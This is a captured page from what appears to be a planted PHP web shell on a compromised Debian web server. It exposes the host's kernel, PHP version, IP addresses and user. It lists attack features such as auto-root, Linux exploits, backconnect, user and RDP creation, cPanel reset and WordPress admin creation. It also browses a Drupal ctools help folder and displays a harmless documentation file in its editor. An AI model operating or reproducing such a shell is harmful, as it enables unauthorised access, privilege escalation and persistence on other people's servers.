Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.214.238
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
help /
[ HOME SHELL ]
Name
Size
Permission
Action
about.html
4.4
KB
-rw-r--r--
ajax.html
0
B
-rw-r--r--
collapsible-div.html
22
B
-rw-r--r--
context-access.html
687
B
-rw-r--r--
context-arguments.html
1.1
KB
-rw-r--r--
context-content.html
6.57
KB
-rw-r--r--
context-context.html
661
B
-rw-r--r--
context-relationships.html
559
B
-rw-r--r--
context.html
0
B
-rw-r--r--
css.html
22
B
-rw-r--r--
ctools.help.ini
1.47
KB
-rw-r--r--
dependent.html
22
B
-rw-r--r--
dropbutton.html
22
B
-rw-r--r--
dropdown.html
22
B
-rw-r--r--
export-ui.html
3.95
KB
-rw-r--r--
export.html
17.27
KB
-rw-r--r--
form.html
22
B
-rw-r--r--
modal.html
13.24
KB
-rw-r--r--
object-cache.html
4.22
KB
-rw-r--r--
plugins-api.html
2.24
KB
-rw-r--r--
plugins-creating.html
10.85
KB
-rw-r--r--
plugins-implementing.html
2.95
KB
-rw-r--r--
plugins.html
1.34
KB
-rw-r--r--
wizard.html
13.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugins.html
<p>The plugins tool allows a module to allow <b>other</b> modules (and themes!) to provide plugins which provide some kind of functionality or some kind of task. For example, in Panels there are several types of plugins: Content types (which are like blocks), layouts (which are page layouts) and styles (which can be used to style a panel). Each plugin is represented by a .inc file, and the functionality they offer can differ wildly.</p> <p>A module which uses plugins can implement a hook describing the plugin (which is not necessary, as defaults will be filled in) and then calls a ctools function which loads either all the known plugins (used for listing/choosing) or a specific plugin (used when it's known which plugin is needed). From the perspective of the plugin system, a plugin is a packet of data, usually some printable info and a list of callbacks. It is up to the module implementing plugins to determine what that info means and what the callbacks do.</p> <p>A module which implements plugins must first implement the <strong>hook_ctools_plugin_directory</strong> function, which simply tells the system which plugins are supported and what directory to look in. Each plugin will then be in a separate .inc file in the directory supplied. The .inc file will contain a specially named hook which returns the data necessary to implement the plugin.</p>
Close